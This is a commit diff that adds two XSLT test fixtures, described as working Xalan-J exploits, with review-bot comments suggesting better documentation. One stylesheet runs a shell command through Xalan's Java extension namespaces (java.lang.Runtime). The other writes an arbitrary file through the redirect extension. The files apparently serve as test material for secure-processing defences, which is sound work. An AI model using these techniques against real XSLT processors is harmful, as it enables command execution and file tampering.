Christian Heimes avatar Christian Heimes committed e8d4667

add two working xalan exploits



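--- a/xmltestdata/xalan_exec.xsl
+++ b/xmltestdata/xalan_exec.xsl
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+     OpenJDK 1.7.0_15
+
+    $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+      org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl
+-->
+<xsl:stylesheet version="1.0"
+     xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+     xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
+     xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+     exclude-result-prefixes="rt ob">
+  <xsl:template match="/">
+  <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
+  <xsl:variable name="command"
+     select="rt:exec($runtimeObject, &apos;/usr/bin/notify-send SomethingBadHappensHere&apos;)"/>
+  <xsl:variable name="commandAsString" select="ob:toString($command)"/>
+  <xsl:value-of select="$commandAsString"/>
+  </xsl:template>
+</xsl:stylesheet>
+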
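Review bot: The header comment in xalan_exec.xsl records the command line but not what the fixture is meant to prove or what a hardened processor should do with it, so a reader cannot tell a pass from a fail. I would extend it with something like `Hostile fixture: reaches java.lang.Runtime through Xalan's Java extension namespaces (rt:, ob:); a TransformerFactory with XMLConstants.FEATURE_SECURE_PROCESSING set to true is expected to reject these calls.` The only visible output is `ob:toString($command)`, which presumably prints a per-run Process object identity. `/usr/bin/notify-send` also needs a desktop session, so the result is hard to assert on a headless CI host, and the comment should state the expected output. The comment should also say the file is loaded only by the test harness, since transforming it runs a command.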

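--- a/xmltestdata/xalan_write.xsl
+++ b/xmltestdata/xalan_write.xsl
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+     OpenJDK 1.7.0_15
+
+    $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+      org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl
+-->
+<xsl:stylesheet version="1.0"
+    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+    xmlns:redirect="http://xml.apache.org/xalan/redirect"
+    extension-element-prefixes="redirect">
+  <xsl:output omit-xml-declaration="yes" indent="yes"/>
+  <xsl:template match="/">
+    <redirect:write file="xalan_redirect.txt" method="text">
+      <xsl:text>Something bad happens here!&#13;</xsl:text>
+    </redirect:write>
+  </xsl:template>
+</xsl:stylesheet>
+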
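Review bot: `redirect:write file="xalan_redirect.txt"` uses a relative path, so the transform leaves an artifact in whatever directory the test is started from, and the header comment neither says so nor tells the harness to clean it up. I would add to the comment `Writes xalan_redirect.txt to the current working directory; run from a scratch directory and delete the file afterwards.` and state the expected result when extension elements are disabled (presumably no file is created). Also, `&#13;` on the `xsl:text` line is a carriage return; if a line ending was intended, `&#10;` is the usual choice.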